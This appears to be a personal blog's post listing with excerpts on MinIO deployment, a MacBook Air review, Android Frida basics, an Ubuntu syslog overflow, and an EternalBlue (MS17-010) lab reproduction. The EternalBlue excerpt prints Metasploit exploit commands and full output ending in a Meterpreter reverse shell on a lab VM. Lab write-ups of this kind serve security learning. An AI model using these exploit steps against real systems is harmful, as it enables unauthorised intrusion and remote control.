Minio的部署和使用

文章写于2025.7.20,具有时效性。 MinIO 是一款高性能、开源、兼容 Amazon S3 协议的对象存储服务,适用于存储大容量非结构化数据(如图片、视频、备份等)。该服务安装部署简单,支持单机与分布式集群模式。开源协议AGPLv3。 使用 MinIO 主要是用 S3 来备份某些应用数据,来应对 Webdav 的缺点。 安装起来很简单,我这里选择用 Docker 部署。 Docker部署minio 访问 dockerhub 的镜像minio/minio - Docker Image | Docker Hub 后台启动+端口映射,持久化映射本地目录到/data,配置用户名和密码。 docker run --name minio_server -d -p 9000:9000 -p 9001:9001 -v [这里改为本地目录]:/data -e MINIO_ROOT_USER=[用户名] -e MINIO_ROOT_PASSWORD=[密码] \ quay.io/minio/minio server /data --console-address ":9001" 使用minio 登录之后创建Buckets。下图是上传一个测试图片和思源笔记的同步测试。 minio-client(mc) 参考官方文档—>MinIO Client — MinIO Object Storage for Linux mac 下使用brew 安装命令brew install minio/stable/mc 设置myminio,mc alias set myminio http://127.0.0.1:9000 [用户名] [密码] ...

July 20, 2025 · 1 min · Yalois

使用三周MacbookAir后的简单总结

在五月月初购入了MacbookAir M4 16+512 天蓝色,国补+学生认证,在京东花了6999.20,没有翻车,后续订了一年的AppleCare+花了599。也是第一次体验到MacOs,甚是喜欢。 之前用了一年多的Ubuntu作为主力系统,现在突然转到新的系统也还好,很快就适应了,因为Mac打开终端还是熟悉的zsh,还有可以安装Homebrew来管理软件包。 虽然只有60hz刷新率,但是动画很丝滑,60hz也可以接受。 简单的总结一下我在使用过程中的问题和解决方案,以及个人觉得很好用的地方。 macbookAir替我解决的问题: 减少背包重量。 缓解续航焦虑,提升工作效率,随用随开。 屏幕刘海遮挡导致菜单栏图标显示不全 这里可以用Ice来菜单栏的收起展开 或者解决刘海,通过让刘海平行的区域都变为黑色Mac App Store 上的“Say No to Notch” 当然还有其他的方案,可以参考这个文章MacBook 刘海(Notch)增强工具推荐 桌面小组件 在AppStore可以安装iPhone和iPad的软件,我下载了不背单词、倒数日、Wakeup课程表。 这些软件的小组件放到桌面上可以说是很方便。 专业课软件如何使用? 首先是常用的开发软件,几乎都是支持多平台的。不支持的的用win11Arm虚拟机来实现。 win11Arm有兼容层能够运行x86程序。上课的时候用思科模拟器没有问题,在计算机组成原理的时候用到Quarts也能正常运行,但是下载程序到试验箱的时候,usb-blaster驱动无法安装,需要在github下载usb-blaster(arm)驱动手动安装。然后通过TypeC转USB的转接头连接到Mac,然后把USB给到win11虚拟机。 触控板or鼠标 如果接鼠标的话,很别扭,安装个Mac Mouse Fix 会习惯。 用了Mac的触控板之后,有点不想用鼠标了。。 常用软件 终端 Tabby(开源终端,好用) 虚拟机 VMware Fusion(免费,下载入口非常难找) Parallels Desktop(付费,融合模式确实好用,无缝使用windows,学生价格¥248一年标准版) UTM(基于 qemu,可以模拟其他架构,在AppStore 是要花钱赞助下载的,官网免费下载,功能一致) 安卓模拟器 BlueStacks Air (免费) MuMu模拟器官网_安卓12模拟器_网易手游模拟器(小贵) AndroidStudio 自带的模拟器,root 权限用来 frida 安卓 Docker管理 Orbstack(免费) 多设备同步 Syncthing(配合wireguard使用) 远程控制 Mac App Store 上的“Windows App” Windows远程控制软件 RSS阅读 Fluent Reader on the Mac App Store(免费,用好几年了) 剪贴板管理器 p0deje/Maccy: Lightweight clipboard manager for macOS 压缩包解压 The Unarchiver | Top Free Unarchiving Software for macOS 浏览器 Microsoft Edge(密码都存在这里,懒得换了) Arc from The Browser Company(非常优雅的浏览器) 开发 JetBrains系列(学生认证免费 Vscode 微信开发者工具(小程序一直不知道做什么,年审都没审 Github Desktop(图形化git,用不习惯hhh 笔记 Obsidian - Sharpen your thinking(yyds Notion(学生认证计划 优化使用体验 Mac Mouse Fix 优化鼠标使用 Ice 菜单栏管理 Mac App Store 上的“Say No to Notch” 隐藏屏幕刘海 共享 App Store 上的“小米互联服务” 能控制小米手机和文件互传 Better365家的产品 Better365 的产品可以说在苹果电脑上很丰富了。只列出我在用的。 ...

May 21, 2025 · 1 min · Yalois

内网渗透日记之永恒之蓝MS17-010

介绍 永恒之蓝漏洞存在于Windows SMB v1协议的处理过程中,具体是在处理SMB v1请求时发生的漏洞。攻击者可以利用该漏洞在目标系统上执行任意代码。通过扫描开放445端口的Windows机器,攻击者可以在无需用户操作的情况下,植入勒索软件、远程控制木马等恶意程序。 编号:CVE-2017-0146 微软漏洞编号:MS17-010 影响范围 Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016 原文链接:https://blog.csdn.net/weixin_55811105/article/details/115804701 复现环境搭建 下载 Windows Server2008 R2,https://www.imsdn.cn/windows-server/windows-server-2008-r2/,然后在vmware安装。 复现 msfconsole search ms17 use exploit/windows/smb/ms17_010_eternalblue set payload set RHOSTS= set LPORTS= run/exploit search ms17 msf6 > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://do cs.metasploit.com/docs/using-metas ploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to u se for authentication. Only affect s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar get machines. SMBPass no (Optional) The password for the sp ecified username SMBUser no (Optional) The username to authent icate as VERIFY_ARCH true yes Check if remote architecture match es exploit Target. Only affects Wi ndows Server 2008 R2, Windows 7, W indows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Serv er 2008 R2, Windows 7, Windows Emb edded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thre ad, process, none) LHOST 172.16.111.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.111.134 RHOSTS => 172.16.111.134 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 172.16.111.129:4444 [*] 172.16.111.134:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 172.16.111.134:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 172.16.111.134:445 - Scanned 1 of 1 hosts (100% complete) [+] 172.16.111.134:445 - The target is vulnerable. [*] 172.16.111.134:445 - Connecting to target for exploitation. [+] 172.16.111.134:445 - Connection established for exploitation. [+] 172.16.111.134:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.111.134:445 - CORE raw buffer dump (51 bytes) [*] 172.16.111.134:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 172.16.111.134:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 172.16.111.134:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 172.16.111.134:445 - 0x00000030 6b 20 31 k 1 [+] 172.16.111.134:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.111.134:445 - Trying exploit with 12 Groom Allocations. [*] 172.16.111.134:445 - Sending all but last fragment of exploit packet [*] 172.16.111.134:445 - Starting non-paged pool grooming [+] 172.16.111.134:445 - Sending SMBv2 buffers [+] 172.16.111.134:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.111.134:445 - Sending final SMBv2 buffers. [*] 172.16.111.134:445 - Sending last fragment of exploit packet! [*] 172.16.111.134:445 - Receiving response from exploit packet [+] 172.16.111.134:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 172.16.111.134:445 - Sending egg to corrupted connection. [*] 172.16.111.134:445 - Triggering free of corrupted buffer. [*] Sending stage (203846 bytes) to 172.16.111.134 [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Meterpreter session 1 opened (172.16.111.129:4444 -> 172.16.111.134:49178) at 2025-04-19 12:58:14 -0400 meterpreter > help 很多命令可以去使用。。。 ...

April 19, 2025 · 3 min · Yalois

安卓逆向——从0学习Frida(配合FridaLab)

一年前还是会一点的,过了这么久忘了挺多,重新学一下。写一个博客来记录,往后也可以给学弟学妹作为参考。 0.基础配置 安装配置Android模拟器 本文使用MuMu模拟器-https://mumu.163.com/。 在主页下载之后,安装打开。 在设置中打开root权限 勾选之后重启模拟器。 通过adb连接模拟器 打开文件所在位置,找到自带的adb(就不用去额外下载了) 在这里目录下打开cmd,Shift+鼠标右键进入终端。 直接在cmd调用是没有的,可以把adb加到环境变量里 添加完之后就能在cmd随时随地调用了。 Q:MuMu模拟器如何启动adb调试? A:官方文档https://mumu.163.com/help/20230214/35047_1073151.html, 从官方文档可以知道,可通过模拟器右上角菜单-问题诊断,获取ADB调试端口。 在终端执行adb connect 127.0.0.1:16385 连接成功之后就可以用adb命令来操作虚拟机了。 默认一般是16384端口,注意自己的配置。 常用的adb命令 adb devices #列出当前连接的所有设备。 adb install <path_to_apk> #将指定的APK文件安装到设备上。 adb shell #进入设备或模拟器的Linux shell环境,可以执行各种Linux命令。 adb push <本机路径> <模拟器路径> #把电脑上的文件传到模拟器上。 adb pull <模拟器路径> <本机路径> #把模拟器上的文件下载到电脑上。 adb push example.txt /sdcard/ #把当前目录的example.txt传到/sdcard/目录下。 先把模拟器打开放一边。 Frida的安装和配置 Q: 什么是Frida? A: Frida 是一款功能强大的动态代码插桩工具(Dynamic Instrumentation Toolkit),主要用于逆向工程、安全分析、漏洞挖掘以及应用程序的运行时调试。它通过注入脚本到目标进程的内存中,允许开发者和安全研究人员动态修改、监控和调试应用程序的行为,支持多种平台(Android、iOS、Windows、macOS、Linux 等)和编程语言(Java、C/C++、Objective-C、Swift、Python 等)。 ...

April 14, 2025 · 4 min · Yalois

记一次由Ubuntu系统日志引发的存储雪崩

问题出现 事情是这样的,4.5号晚我在写没写完的三月总结,系统突然提示存储空间不足,很奇怪,明明之前还有七八十个G的。难道是中木马了? 然后紧急保存文章,但是因为0字节可用,文章直接消失了。md文件直接显示0字节。我悲痛万分,开始排查。 占用排查 因为好久没有登陆tg了,就这次登录出问题了,还以为是tg的聊天记录太多了,然后删除了好多,发现并没有什么用。 软件确实也没啥奇怪的,今晚还安装了tradingview但是连不上网就卸载了。 然后去检测磁盘的空间,使用dust这个CLI应用,算是du命令的升级版。还有看了一下Ubuntu系统自带的系统占用分析器。 最终锁定在/var/log/syslog这个文件,整整106G。 然后我把这个日志mv到了我的硬盘里,先让系统恢复正常,准备去分析。 恢复typora内容 写了这么久的博客突然消失,挺难过的。还在想重写一遍又得花大量时间,去网上搜了搜typora的崩溃恢复。 还真找到了!https://blog.csdn.net/m0_51360693/article/details/120458414 在偏好设置里有个恢复为保存的草稿。 太好了!!内容都在,typora这会员没有白买!!! 遇到问题一定要保持冷静,尽力去想办法恢复,不要自暴自弃。 文档损坏的时候,我整个人都陷入低迷状态,很无力,还好我抱着试一试的心态去找解决方案而不是摆烂。 不要被情绪控制。 日志分析 刚才是给大文件挪出来了,需要具体分析,但是文件太大了,没法直接预览。 用grep命令正则匹配某天的日志输出再查看。 grep -E '^2025-04-05' ../syslog > 04-05.log 发现重定向的文件很大,先中断。 再看一下昨天的日志grep -E '^2025-04-05' ../syslog > 04-04.log,这个日志只有1.5M。 日志锁定在04-05,导出一部分进行编辑。 看20000行和30000行,都是这个报错。看时间戳,确实是这个日志一直报错导致的syslog爆满。 真相大白 原因是我安装的tradingview没有网络套接字权限,一直报错Permission denied。报错频率很高,不停往syslog写入,写了几十个G,导致磁盘爆满。 具体原因在google上找到了同类问题。 https://community.brave.com/t/syslog-overflow/50248 和snap命令有关。 problem resolved, The problem was caused through the improper removal of brave application with the us of snap command. snap purge brave removes brave without disconnecting it from the kernel, should of run the obvious snap remove brave. ...

April 6, 2025 · 1 min · Yalois